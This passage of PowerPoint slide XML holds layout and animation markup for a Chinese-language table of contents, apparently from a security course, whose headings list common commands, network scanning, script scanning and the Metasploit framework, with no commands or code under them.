            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
